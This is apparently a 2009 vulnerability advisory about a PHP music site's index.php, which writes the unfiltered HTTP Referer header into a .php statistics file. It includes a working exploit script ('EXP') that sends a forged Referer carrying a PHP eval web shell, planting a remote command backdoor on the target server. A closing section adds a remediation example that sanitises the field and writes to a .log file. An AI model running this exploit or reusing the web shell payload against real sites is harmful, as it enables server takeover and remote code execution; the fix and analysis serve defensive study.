Electronic bucket music get shell vulnerability - vulnerability warning - the black bar safety net

2009-11-24T00:00:00
ID MYHACK58:62200925405
Type myhack58
Reporter Anonymous
Modified 2009-11-24T00:00:00

Description

index.php line 10

$data_name=get_date();

... ...

$from=$_SERVER["HTTP_REFERER"];

... ...

if(file_exists("$sys_data_dir/stat/$data_name.php"))
{
    $stat_data=file("$sys_data_dir/stat/$data_name.php");
    for($a=0;$a<count($stat_data);$a++)
    {
        $stat_info=explode("|",$stat_data[$a]);
        // If this IP has already visited and less than the recording interval has passed, exit the loop
        if($stat_info[0]==$ip && $time_stamp-$stat_info[2]<$time_part)
        {
            break;
        }
        // If this IP has already visited but more than the recording interval has passed, write a new record
        if($stat_info[0]==$ip && $time_stamp-$stat_info[2]>$time_part)
        {
            $tod_data=readfrom("$sys_data_dir/stat/$data_name.php");
            $new_data="$ip|$data_name/$now_time|$time_stamp|$earth_ip|$from|\n".$tod_data;
            writeto("$sys_data_dir/stat/$data_name.php",$new_data);
            break;
        }
------------------------------------------------------------------------------------


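$from is taken directly from the client's Referer header and is written unfiltered into a statistics file that has a .php extension, so a forged HTTP Referer header writes a shell to /data/stat/year-month-day.php
------------------------------------------------------------------------------------
EXP: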

<?
$server = ""; //host
$host = ""; //host
$target = '/index.php'; //vul file
$referer = '<? eval($_POST['CMD']);?>'; // Referer
$port = 80;
$fp = fsockopen($server, $port, $errno, $errstr, 30);
if (!$fp)
{
    echo "$errstr ($errno)<br />\n";
}
else
{
    $out = "GET $target HTTP/1.1\r\n";
    $out .= "Host: $host\r\n";
    $out .= "Cookie: ASPSESSIONIDSQTBQSDA=DFCAPKLBBFICDAFMHNKIGKEG\r\n";
    $out .= "Referer: $referer\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    while (!feof($fp))
    {
        echo fgets($fp, 128);
    }
    fclose($fp);
}
?>
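One way to close the hole in the index.php statistics write shown above, as an added example that is not the application's own code: the record is appended to a non-executable .log file instead of a .php file, and the Referer is stripped of control characters, the | delimiter and angle brackets before it is stored. The names clean_field() and record_visit(), the .log extension, the simplified record layout and the temporary demo directory are assumptions.

```php
<?php
// Added example, not the application's code. clean_field(), record_visit(),
// the .log extension and the record layout are assumptions for illustration.

// Neutralise one client-supplied value before it enters a '|'-delimited record.
function clean_field(string $value, int $max = 255): string
{
    // Drop control characters (CR/LF included) so one request cannot forge extra records.
    $value = preg_replace('/[\x00-\x1F\x7F]/', '', $value) ?? '';
    // Percent-encode the field delimiter and the characters that open or close a tag.
    $value = strtr($value, ['|' => '%7C', '<' => '%3C', '>' => '%3E']);
    // Bound the length so a single header cannot bloat the statistics file.
    return substr($value, 0, $max);
}

// Append one visit record and return the path of the file it was written to.
function record_visit(string $dir, string $ip, string $referer, int $now): string
{
    // Non-executable extension: the web server never hands this file to the PHP
    // interpreter. Keeping $dir outside the web root is a further safeguard.
    $file = $dir . '/' . date('Y-m-d', $now) . '.log';
    $line = implode('|', [
        filter_var($ip, FILTER_VALIDATE_IP) ?: 'invalid',
        $now,
        clean_field($referer),
    ]) . "|\n";
    // Append under an exclusive lock instead of read, prepend and rewrite.
    file_put_contents($file, $line, FILE_APPEND | LOCK_EX);
    return $file;
}

// Constructed input: a documentation-range IP and the Referer value from the EXP above.
$dir = sys_get_temp_dir() . '/stat_demo_' . getmypid();
is_dir($dir) || mkdir($dir, 0700);
$file = record_visit($dir, '203.0.113.7', "<? eval(\$_POST['CMD']);?>", time());

// The stored record contains %3C and %3E instead of < and >, in a .log file.
echo $file, "\n", file_get_contents($file);
```

Statistics files already written by the vulnerable code keep their .php extension, so existing files under the stat directory still need to be checked for PHP tags and removed or renamed.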
